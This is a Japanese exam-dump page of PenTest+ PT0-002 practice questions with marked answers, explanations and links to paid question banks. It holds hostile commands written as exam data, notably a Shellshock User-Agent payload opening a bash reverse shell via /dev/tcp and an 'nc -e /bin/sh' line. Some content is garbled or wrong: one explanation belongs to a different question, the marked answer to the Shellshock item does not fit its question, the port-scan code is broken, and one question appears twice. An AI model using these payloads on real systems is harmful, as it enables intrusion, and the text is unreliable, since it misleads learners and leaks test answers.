2024年01月 CompTIA PT0-002実際にある問題と100%カバー率リアル試験問題 [Q168-Q184]

2024年01月 CompTIA PT0-002実際にある問題と100%カバー率リアル試験問題

PT0-002無料試験問題と解答PDF最新問題2024年01月

質問 # 168
After running the enum4linux.pl command, a penetration tester received the following output:

Which of the following commands should the penetration tester run NEXT?

A. smbget //192.168.100.56/web -U ''
B. smbspool //192.160.100.56/print$
C. net rpc share -S 192.168.100.56 -U ''
D. smbclient //192.168.100.56/web -U '' -N

正解：D

解説：
Explanation
A vulnerability scan is a type of assessment that helps to identify vulnerabilities in a network or system. It scans systems for potential vulnerabilities, misconfigurations, and outdated software. Based on the output from a vulnerability scan, a penetration tester can identify vulnerabilities that may be exploited to gain access to a system. In this scenario, the output from the penetration testing tool shows that 100 hosts contained findings due to improper patch management. This indicates that the vulnerability scan detected vulnerabilities that could have been prevented through proper patch management. Therefore, the most likely test performed by the penetration tester is a vulnerability scan.

質問 # 169
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

A. Apple
B. Linux
C. Android
D. Windows

正解：D

解説：
Explanation
The ping -A command sends an ICMP echo request with a specified TTL value and displays the response.
The TTL value indicates how many hops the packet can traverse before being discarded. Different OSs have different default TTL values for their packets. Windows uses 128, Apple uses 64, Linux uses 64 or 255, and Android uses 64. Therefore, a packet with a TTL of 128 is most likely from a Windows OS.

質問 # 170
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

A. Move laterally to create a user account on LDAP
B. Create a one-shot system service to establish a reverse shell.
C. Run the nc -e /bin/sh <...> command.
D. Obtain /etc/shadow and brute force the root password.

正解：B

解説：
https://hosakacorp.net/p/systemd-user.html

質問 # 171
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

正解：D

質問 # 172
Using the output, identify potential attack vectors that should be further investigated.

正解：

解説：
1: Null session enumeration
Weak SMB file permissions
Fragmentation attack
2: nmap
-sV
-p 1-1023
192.168.2.2
3: #!/usr/bin/python
export $PORTS = 21,22
for $PORT in $PORTS:
try:
s.connect((ip, port))
print("%s:%s - OPEN" % (ip, port))
except socket.timeout
print("%:%s - TIMEOUT" % (ip, port))
except socket.error as e:
print("%:%s - CLOSED" % (ip, port))
finally
s.close()
port_scan(sys.argv[1], ports)

質問 # 173
A penetration tester received a .pcap file to look for credentials to use in an engagement.
Which of the following tools should the tester utilize to open and read the .pcap file?

A. Wireshark
B. Metasploit
C. Nmap
D. Netcat

正解：A

質問 # 174
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

A. Perform routine static and dynamic analysis of committed code.
B. Perform fuzz testing of compiled binaries.
C. Validate API security settings before deployment.
D. Add a dependency checker into the tool chain.

正解：D

解説：
Explanation
Adding a dependency checker into the tool chain is the best recommendation for the company that has been including vulnerable third-party modules in multiple products. A dependency checker is a tool that analyzes the dependencies of a software project and identifies any known vulnerabilities or outdated versions. This can help the developers to update or replace the vulnerable modules before deploying the products.

質問 # 175
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

A. Scarcity and fear
B. Authority and urgency
C. Social proof and greed
D. Familiarity and likeness

正解：B

質問 # 176
The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a
"probable port scan" alert in the organization's IDS?

A. Line 02
B. Line 07
C. Line 01
D. Line 08

正解：D

質問 # 177
A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?

A. inurl:
B. intitle:
C. link:
D. site:

正解：D

質問 # 178
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

A. Scarcity and fear
B. Authority and urgency
C. Social proof and greed
D. Familiarity and likeness

正解：B

質問 # 179
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

A. nmap192.168.1.1-5-PU22-25,80
B. nmap192.168.1.1-5-Ss22-25,80
C. nmap192.168.1.1-5-PA22-25,80
D. nmap192.168.1.1-5-PS22-25,80

正解：D

解説：
Explanation
PS/PA/PU/PY are host discovery flags which use TCP SYN/ACK, UDP or SCTP discovery respectively. And since the ports in the options are mostly used by TCP protocols, then it's either the PS or PA flag. But since we need to know if the ports are live, sending SYN packet is a better alternative. Hence, I choose PS in this case.

質問 # 180
Which of the following assessment methods is MOST likely to cause harm to an ICS environment?

A. Ping sweep
B. Packet analysis
C. Protocol reversing
D. Active scanning

正解：D

質問 # 181
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

A. A firewall or IPS blocked the scan.
B. The penetration tester used unsupported flags.
C. The edge network device was disconnected.
D. The scan returned ICMP echo replies.

正解：A

質問 # 182
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A. Hydra and crunch
B. Nmap and OWASP ZAP
C. Netcat and cURL
D. Burp Suite and DIRB

正解：D

質問 # 183
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

A. Call law enforcement officials immediately
B. Collect the proper evidence and add to the final report
C. Try to take down the attackers
D. Reach out to the primary point of contact

正解：D

解説：
Explanation
The penetration tester should reach out to the primary point of contact as soon as possible to inform them of the critical vulnerability and the active exploitation by cybercriminals. This is the most responsible and ethical course of action, as it allows the client to take immediate steps to mitigate the risk and protect their assets. The other options are not appropriate or effective in this situation. Trying to take down the attackers would be illegal and dangerous, as it may escalate the conflict or cause collateral damage. Calling law enforcement officials immediately would be premature and unnecessary, as it may involve disclosing confidential information or violating the scope of the engagement. Collecting the proper evidence and adding to the final report would be too slow and passive, as it would delay the notification and remediation of the vulnerability.

質問 # 184
......

Comptia Pentest+試験は、セキュリティに焦点を当てたIT関連の役割で最低3年の経験を持つ専門家を対象としています。認定試験は、効果的な浸透テストに必要なスキルを検証し、ITセキュリティ雇用市場での雇用可能性を向上させることができます。 PT0-002の試験では、計画とスコーピング、偵察、脆弱性の識別、脆弱性の悪用、抽出後のテクニックの悪用、報告と通信などのトピックについて説明しています。認定された専門家は、システムとネットワークをサイバーの脅威から保護するために必要な知識とスキルを持っていることを雇用主に示すことができます。

Comptia PT0-002試験は、Comptia Pentest+認定試験の更新バージョンです。この新しいバージョンは、サイバーセキュリティ業界の最新の基準を満たすように設計されており、以前のバージョンよりも包括的です。この新しい試験では、クラウドコンピューティング、IoT（モノのインターネット）デバイス、モバイルデバイスなど、より広範な技術をカバーしています。更新された試験の目的は、国立標準技術研究所（NIST）サイバーセキュリティフレームワークとも一致しています。これは、多くの組織がシステムとネットワークを保護するために使用する標準です。

CompTIA PT0-002リアル2024年最新のブレーン問題集模擬試験問題集：https://www.goshiken.com/CompTIA/PT0-002-mondaishu.html

最新PT0-002試験問題集で最近更新された310問題：https://drive.google.com/open?id=1DPaJ7JtaMgcHIQq0772pDt7PLCtzojWy

関するブログ

もっと

PT0-002無料問題集